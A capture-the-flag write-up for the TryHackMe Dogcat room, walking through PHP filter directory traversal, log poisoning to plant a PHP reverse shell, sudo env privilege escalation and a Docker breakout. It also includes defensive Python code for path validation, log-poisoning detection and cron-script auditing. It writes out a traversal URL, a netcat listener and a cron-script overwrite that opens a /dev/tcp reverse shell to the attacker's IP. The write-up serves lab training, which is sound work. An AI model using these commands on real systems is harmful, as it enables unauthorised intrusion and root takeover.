CHALLENGE OVERVIEW
- Link: THM Dogcat
- Difficulty: Medium
- Target: Flags 1-4
- Highlight: intercepting and modifying a web request using burpsuite
- Tools used: base64, burpsuite
- Tags: docker, directory traversal
BACKGROUND

In this tutorial, we will walk through a simple website showing pictures of dogs and cats.
We’ll discover a directory traversal vulnerability that we can leverage to read sensitive files on the target machine.
At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.
ENUMERATION/RECON

export target=10.10.148.135
export myIP=10.6.2.23
Let’s walk the site.
It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files.
Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend.
We’ll use a simple PHP filter to convert the contents to base64 and output the raw base64 string.
http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
Raw output:
Let’s save this string as a file named “string”. Then we can use the command “cat string | base64 -d” to decode this string and view it as raw HTML code.

Reading over this HTML code, we can see that the file extension can be set!
If the user doesn’t specify the extension, the default will be .php. This means that we can add “&ext=” to the end of our web address to prevent the .php extension from being appended.
In order for it to properly display our request, we need to include the word “dog” or “cat” somewhere in the address.
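As an added illustration (not code from the Dogcat room or from this write-up), here is a Python model of the two checks described above: the weak one only requires the view value to contain “dog” or “cat” and appends .php unless the client supplies ext, while the hardened resolver matches an exact allowlist, ignores any client-supplied extension, and confines the resolved path to the images directory. The function names, the allowlist and the base directory are assumptions made for illustration.

```python
# Added example (not code from the Dogcat room or from this write-up): a Python
# model of the weak view/ext handling described above, next to a hardened
# resolver. Names, the allowlist and the base directory are assumptions.
import os
from urllib.parse import parse_qs, urlsplit

ALLOWED_VIEWS = {"dog", "cat"}  # the only two pages the site legitimately serves


def params_from_url(url):
    """Pull the view and ext query parameters out of a URL. ext stays None when
    absent and becomes '' when supplied empty, mirroring PHP's isset() check."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    view = query.get("view", [None])[0]
    ext = query.get("ext", [None])[0]
    return view, ext


def weak_resolve(view, ext=None):
    """Model of the check described above: the value only has to *contain*
    'dog' or 'cat', and '.php' is appended unless the client supplies ext."""
    if view is None or ("dog" not in view and "cat" not in view):
        return None
    if ext is None:
        ext = ".php"
    return view + ext


def hardened_resolve(view, base_dir):
    """Exact allowlist match, no client-controlled extension, and the resolved
    path must stay inside base_dir (defence in depth against '..' and wrappers)."""
    if view not in ALLOWED_VIEWS:
        return None
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, view + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    url = "http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index"
    view, ext = params_from_url(url)
    print("weak    :", weak_resolve(view, ext))       # wrapper passes the substring check
    print("hardened:", hardened_resolve(view, "/srv/dogcat"))  # None: not in allowlist
```

The substring test is what lets a php:// wrapper or a ./dog/../ prefix through; the fix is to treat the parameter as a key into a fixed map of views rather than as a path fragment, and to keep the realpath confinement as a second line of defence.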

Let’s dive in with burpsuite and start intercepting and modifying requests.
Here is our order of steps for us to get our initial foothold on the target machine:
- Create a PHP reverse shell
- Start up our netcat listener
- Use burp to intercept and modify the web request. Wait until later to click “forward”.
- Spin up a simple HTTP server with Python in the same directory as the PHP revshell.
- Click “forward” on burp to send the web request.
- Activate the shell by entering $targetIP/bshell.php in the browser address
- Catch the revshell on netcat!

STEP 1
Let’s create a PHP pentest monkey revshell.

STEP 2
Let’s first start up a netcat listener on port 2222.
nc -lnvp 2222
STEP 3
Intercept the web request for the Apache2 log and modify the User-Agent field with PHP code that fetches shell.php from our machine and saves it as bshell.php on the target.
This works only because, upon examining the Apache2 logs, we noticed that the User-Agent field is logged unencoded and is vulnerable to injection: PHP placed in it executes when the log file is included through the traversal (log poisoning). Make sure to wait to click forward until step 5.
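From the defender’s side, the two indicators this step depends on are both visible in the web server log. The following detector is an added example, not part of the original write-up: it parses constructed Apache combined-format lines and flags a PHP open tag in the User-Agent (the poisoning vector) and php:// wrappers or dot-dot segments in the request line (the traversal). The IPs, timestamps and sample lines are constructed, not taken from the box.

```python
# Added example, not part of the original write-up: detector for log poisoning
# and traversal indicators over constructed Apache combined log lines.
import re

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)              # <?php or <?= in a header
TRAVERSAL = re.compile(r"php://|\.\./|%2e%2e", re.IGNORECASE)  # wrapper or dot-dot

# Constructed sample log; the third line carries a harmless PHP tag in its UA.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:07 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=./dog/../index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:15 +0000] "GET /?view=cat HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"
10.0.0.5 - - [10/Mar/2024:12:00:20 +0000] "GET /?view=cat HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def scan(log_text):
    """Return one finding per suspicious line: ip, timestamp and the reasons."""
    findings = []
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; a real deployment would count these
        reasons = []
        if PHP_TAG.search(m["ua"]):
            reasons.append("php_tag_in_user_agent")
        if TRAVERSAL.search(m["req"]):
            reasons.append("wrapper_or_traversal_in_request")
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], ", ".join(f["reasons"]))
```

Alerting on a PHP tag in any request header is a cheap, low-noise rule for a PHP host; the traversal pattern is noisier and is best correlated with the same client address, as the sample shows.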

STEP 4
We’ll spin up a simple Python HTTP server in the same directory as our revshell to serve shell.php to our target machine via the modified web request we created in burpsuite.

STEP 5
Click forward on burp and check that a 200 status code came through for shell.php on the HTTP server.

STEP 6
We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.

STEP 7
We successfully caught it! Now we are in with our initial foothold!

INITIAL FOOTHOLD

LOCATE THE FIRST FLAG
Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.
http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=
Now we can decode this string (saved as firstflag.txt) with base64:
base64 --decode firstflag.txt
<?php $flag_1 = "THM{Th—------------ommitted—-------fa}" ?>
LOCAL RECON

LOCATE THE SECOND FLAG
We manually enumerate the filesystem and discover the second flag at /var/www/flag2_QMW7JvaY2LvK.txt
The find command can also help us quickly scan the filesystem for any files whose name contains the word “flag”:
find / -type f -name '*flag*' 2>/dev/null
We found the second flag in plaintext!
cat flag2_QMW7JvaY2LvK.txt
THM{LF—------------ommitted—-------fb}
CHECK SUDO PERMISSIONS
Let’s check out our sudo permissions with the command:
sudo -l
Matching Defaults entries for www-data on 26e23794a52b:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on 26e23794a52b:
    (root) NOPASSWD: /usr/bin/env
EXPLOIT/PRIVILEGE ESCALATION

Because we can run the env binary with sudo and without a password, we can easily become root with the command:
$ sudo env /bin/bash
Now we can verify that we are root with the command whoami.
GRAB THE THIRD FLAG
cd /root
ls
flag3.txt
cat flag3.txt
THM{D1—------------ommitted—-------12}
POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER
Let’s start up a new listener to catch the new bash shell outside of the container.
nc -lnvp 3333

We notice that there is a backup.sh that regularly runs on a schedule via cronjobs. We can hijack this file, which is run by root outside of the docker container, by changing its contents to spawn a revshell.
echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{esc—------------ommitted—-------2d}
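The defensive counterpart of this hijack is to watch the scripts root runs from cron for permission and content changes. The audit below is an added example, not part of the original write-up: it records a baseline hash of each scheduled script, then reports any script that is writable by group or other, not owned by the expected uid, or whose contents no longer match. The script body and directory are constructed in a temporary directory; the real backup.sh on the box is not reproduced.

```python
# Added example, not part of the original write-up: integrity and permission
# audit for cron-run scripts, the defensive counterpart of the backup.sh hijack.
# The script contents and directory are constructed in a temp dir.
import hashlib
import os
import stat
import tempfile


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def baseline(paths):
    """Hash every scheduled script once, at a time the files are trusted."""
    return {p: sha256_of(p) for p in paths}


def audit(paths, known_hashes, expected_uid=0):
    """Return {path: [issues]} for scripts that deviate from the baseline."""
    findings = {}
    for p in paths:
        issues = []
        st = os.stat(p)
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append("writable_by_group_or_other")
        if st.st_uid != expected_uid:
            issues.append("not_owned_by_expected_uid")
        if sha256_of(p) != known_hashes.get(p):
            issues.append("content_changed")
        if issues:
            findings[p] = issues
    return findings


def demo():
    """Simulate the pattern above: a cron script is loosened and rewritten."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "backup.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\necho 'placeholder backup job'\n")  # constructed body
        os.chmod(script, 0o750)
        known = baseline([script])
        assert audit([script], known, expected_uid=os.getuid()) == {}

        # Tampering: the file becomes world-writable and its body is replaced.
        os.chmod(script, 0o777)
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\necho 'replaced by an untrusted writer'\n")  # constructed
        return list(audit([script], known, expected_uid=os.getuid()).values())


if __name__ == "__main__":
    print(demo())  # [['writable_by_group_or_other', 'content_changed']]
```

In a real deployment the baseline would be stored outside the container (the file here was reachable from inside it, which is the whole problem), and the check would run from the host before cron executes the script rather than alongside it.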
FINAL THOUGHTS

This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold.
Once we secured a revshell, the rest of the box went pretty quickly.
The final step of breaking out of a docker container with a second revshell was the sneakiest part for me.
The PHP directory traversal, and using a PHP filter to encode with base64, was also a cool way to evade the data sanitization measures in place on the backend.

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.